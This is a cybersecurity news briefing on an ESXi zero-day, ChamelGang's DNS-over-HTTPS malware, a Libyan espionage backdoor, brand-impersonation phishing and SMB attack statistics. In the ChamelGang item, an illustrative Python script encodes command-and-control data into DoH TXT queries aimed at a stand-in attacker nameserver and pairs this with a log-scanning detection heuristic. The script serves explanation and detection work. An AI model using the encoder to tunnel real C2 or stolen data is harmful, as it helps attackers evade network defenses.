At a glance.
- Chinese threat actor exploits VMware ESXi zero day.
- ChamelGang uses DNS-over-HTTPS tunneling.
- Cyberespionage campaign targets Libya.
- Brand impersonation online fraud.
- Cyber risk trends for small and medium businesses.
Chinese threat actor exploits VMware ESXi zero day.
Mandiant says a Chinese cyberespionage actor tracked as "UNC3886" is exploiting a VMware ESXi zero-day flaw "that enabled the execution of privileged commands across Windows, Linux, and PhotonOS (vCenter) guest VMs without authentication of guest credentials from a compromised ESXi host and no default logging on guest VMs." After exploiting the vulnerability, the threat actor "[deployed] backdoors on ESXi hosts using an alternative socket address family, VMCI, for lateral movement and continued persistence. This address family enabled direct reconnection from any guest VM to the compromised ESXi host’s backdoor regardless of network segmentation or firewall rules in place."
Charles Carmakal, CTO, Mandiant Consulting, Google Cloud, offered the following comments:
"UNC3886 is one of the most clever China-nexus espionage actors that we see nowadays. They have strong operational security and are very hard to detect in victim environments. They monitor Mandiant's blogs that describe their tradecraft and they quickly retool to evade detection. They try to limit their malware deployment to victim systems that do not support endpoint detection and response (EDR) solutions, making it very difficult for organizations to detect their intrusions. They've successfully compromised defense, technology, and telecommunications organizations with mature security programs in place."
ChamelGang uses DNS-over-HTTPS tunneling.
Researchers at Stairwell have observed a new strain of Linux malware that uses DNS-over-HTTPS (DoH) tunneling. The malware was developed by ChamelGang, a China-aligned threat actor that's targeted "energy, aviation, and government organizations in Russia, the United States, Japan, Turkey, Taiwan, Vietnam, India, Afghanistan, Lithuania, and Nepal." The researchers state, "The implant’s C2 configuration is a JSON object containing two keys....This configuration is then used by the implant to craft DoH requests using the configured providers and malicious nameservers, encoding its C2 communications as subdomains of the malicious nameserver and issuing TXT requests for the generated domain containing the encoded C2 communications. Due to these DoH providers being commonly utilized DNS servers for legitimate traffic, they cannot easily be blocked enterprise-wide. Additionally, HTTPS prevents inspection of these requests without man-in-the-middling the traffic, so defenders cannot easily identify what domain requests are being made over DoH and selectively detect or prevent anomalous traffic such as ChamelDoH’s encoded communications."
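The following Python is an added illustration, not code from Stairwell or from the ChamelDoH implant, of the two halves of the technique described above: an encoder that packs a C2 message into subdomain labels under an attacker-controlled nameserver and wraps it in a DoH TXT query, and the log-side heuristic a defender can apply when the DoH request URLs are visible. The nameserver name, the base32 encoding, the JSON-style DoH GET API (the `/resolve?name=&type=` form rather than RFC 8484 wire-format `?dns=`), the log format and the log lines are all constructed assumptions; the real implant's encoding and its configuration keys are not given in the text.

```python
import base64
import math
import urllib.parse
from collections import Counter

# Constructed values for the example; not ChamelDoH's real configuration.
MALICIOUS_NS = "ns.example-c2.test"
DOH_PROVIDER = "https://dns.google/resolve"   # JSON-style DoH API (assumption)
MAX_LABEL = 63                                # RFC 1035 label length limit
MAX_NAME = 253                                # RFC 1035 total name length limit


def encode_c2(payload: bytes, nameserver: str) -> str:
    """Pack a C2 message into base32 subdomain labels under `nameserver`.
    Base32 is an assumed encoding; it is DNS-safe (letters and digits only)."""
    b32 = base64.b32encode(payload).decode().rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    name = ".".join(labels + [nameserver])
    if len(name) > MAX_NAME:
        raise ValueError("payload too large for one query; chunk it")
    return name


def decode_c2(name: str, nameserver: str) -> bytes:
    """Inverse of encode_c2: strip the nameserver suffix, rejoin labels, re-pad."""
    suffix = "." + nameserver
    if not name.endswith(suffix):
        raise ValueError("not a query for our nameserver")
    b32 = name[:-len(suffix)].replace(".", "").upper()
    b32 += "=" * (-len(b32) % 8)
    return base64.b32decode(b32)


def build_doh_query(provider: str, name: str, rrtype: str = "TXT") -> str:
    """URL the implant would fetch over HTTPS (built only, never sent here)."""
    return f"{provider}?{urllib.parse.urlencode({'name': name, 'type': rrtype})}"


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def is_suspicious_name(name: str, rrtype: str) -> bool:
    """Heuristic: TXT queries whose subdomain part is long and high-entropy
    look like tunneled data rather than a hostname. The registrable domain is
    approximated as the last two labels (a public-suffix list is better)."""
    labels = name.rstrip(".").split(".")
    sub = "".join(labels[:-2])
    return rrtype == "TXT" and len(sub) >= 40 and shannon_entropy(sub) > 3.0


def scan_doh_log(lines):
    """Return (client, queried_name) for requests that match the heuristic.
    Assumes the DoH URL is visible, i.e. a TLS-inspecting proxy or an
    endpoint agent produced the log; plain HTTPS metadata is not enough."""
    hits = []
    for line in lines:
        fields = line.split()
        url = fields[-1]
        params = urllib.parse.parse_qs(urllib.parse.urlparse(url).query)
        name = params.get("name", [""])[0]
        rrtype = params.get("type", ["A"])[0]
        if is_suspicious_name(name, rrtype):
            client = fields[1].split("=", 1)[1]
            hits.append((client, name))
    return hits


# Constructed proxy log: two ordinary DoH lookups and one tunneled TXT query.
SAMPLE_MESSAGE = b'{"cmd":"id","host":"web01","seq":7}'
CONSTRUCTED_LOG = [
    "2023-06-13T10:00:01Z src=10.0.0.5 GET " + build_doh_query(DOH_PROVIDER, "www.example.com", "A"),
    "2023-06-13T10:00:02Z src=10.0.0.5 GET " + build_doh_query(DOH_PROVIDER, "_dmarc.example.com", "TXT"),
    "2023-06-13T10:00:03Z src=10.0.0.7 GET " + build_doh_query(DOH_PROVIDER, encode_c2(SAMPLE_MESSAGE, MALICIOUS_NS)),
]

if __name__ == "__main__":
    for client, name in scan_doh_log(CONSTRUCTED_LOG):
        print(f"{client} -> {name}")
        print("  decoded:", decode_c2(name, MALICIOUS_NS))
```

The caveat in the Stairwell quote is what makes `scan_doh_log` fragile in practice: without TLS inspection or an endpoint-side view of the request, a defender sees only HTTPS to a popular resolver, and the heuristic has nothing to run on. Where the URL is visible, the same length-and-entropy check applies to classic UDP DNS tunneling as well.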
Cyberespionage campaign targets Libya.
Check Point describes an espionage campaign that targeted entities in Libya with a new backdoor tracked as "Stealth Soldier." The threat actor used phishing sites that purported to belong to the Libyan Foreign Affairs Ministry. Check Point states, "Stealth Soldier is a custom implant, likely used in a limited set of targeted attacks. The implant enables surveillance operations and supports functionality such as keystroke logging and screenshot and microphone recordings. The different versions found suggest that Stealth Soldier is actively maintained as of January 2023, the compilation timestamp of its latest version."
The researchers also found ties between Stealth Soldier and the state-sponsored Eye on the Nile campaign that targeted civil society organizations in Egypt in 2019.
Brand impersonation online fraud.
Researchers at Bolster have observed a phishing campaign that’s impersonating more than a hundred clothing and footwear brands. It’s direct fraud, targeting online consumers. The impersonated brands include Nike, Puma, Adidas, Casio, Crocs, Skechers, Caterpillar, New Balance, Fila, and Vans. The threat actors have used over 6,000 domains, more than half of which are still active. The researchers note that some of the scam sites appear prominently in Google search results: “Attackers are employing various search engine optimization (SEO) techniques to manipulate search engine rankings and increase visibility. This attack seems meticulously planned as the domains were registered two years in advance, allowing for aged domains that in some cases greatly increases their rank to the second or third result in Google search for many brand-related keywords.”
Cyber risk trends for small and medium businesses.
Researchers at BlackFog have determined that 61% of SMBs have sustained a successful cyberattack in the past twelve months. The researchers state, “On average organizations saw close to five successful data breaches, malware or ransomware attacks affecting their network. Critically for SMBs, the main impact of an attack was business downtime, which affected 58% of respondents. The successful attacks also negatively impacted customer trust and retention with a third of all respondents reporting that the incidents resulted in the loss of customers. Worryingly, 39% of organizations affected also reported a loss of customer data.”